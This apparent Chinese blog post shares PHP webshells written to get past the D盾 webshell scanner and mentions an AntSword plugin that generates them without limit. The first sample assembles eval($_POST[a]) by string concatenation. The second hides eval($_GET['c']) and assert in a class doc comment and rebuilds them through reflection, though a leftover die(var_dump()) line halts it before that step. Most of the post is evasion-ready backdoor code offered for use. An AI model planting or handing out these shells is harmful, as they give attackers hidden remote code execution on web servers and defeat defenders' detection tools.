继续过D盾

一直在不停的收集 绕D盾的shell 也在不断的研究新的姿势去绕过。

这次收到复活邮件之后,就再来发一个吧。

<?php
function sys(){
    return 'al($_';
}
@eval('@ev'.sys().'POST[a]);');

项目地址:

蚁剑插件版:

已经无限生成啦

<?php
    /**
    * eva
    * l($_GE
    * T["c"]);
    * asse
    * rt
    */
    class TestClass { }
    $rc = new ReflectionClass('TestClass');
    $str = $rc->getDocComment();
    die(var_dump($str));
    $evf=substr($str,strpos($str,'e'),3);
    $evf=$evf.substr($str,strpos($str,'l'),6);
    $evf=$evf.substr($str,strpos($str,'T'),8);
    $fu=substr($str,strpos($str,'as'),4);
    $fu=$fu.substr($str,strpos($str,'r'),2);
    $fu($evf);
?> 

php的动态解析 和 弱类型 ,你如果了解各种特性,你可以随便过 。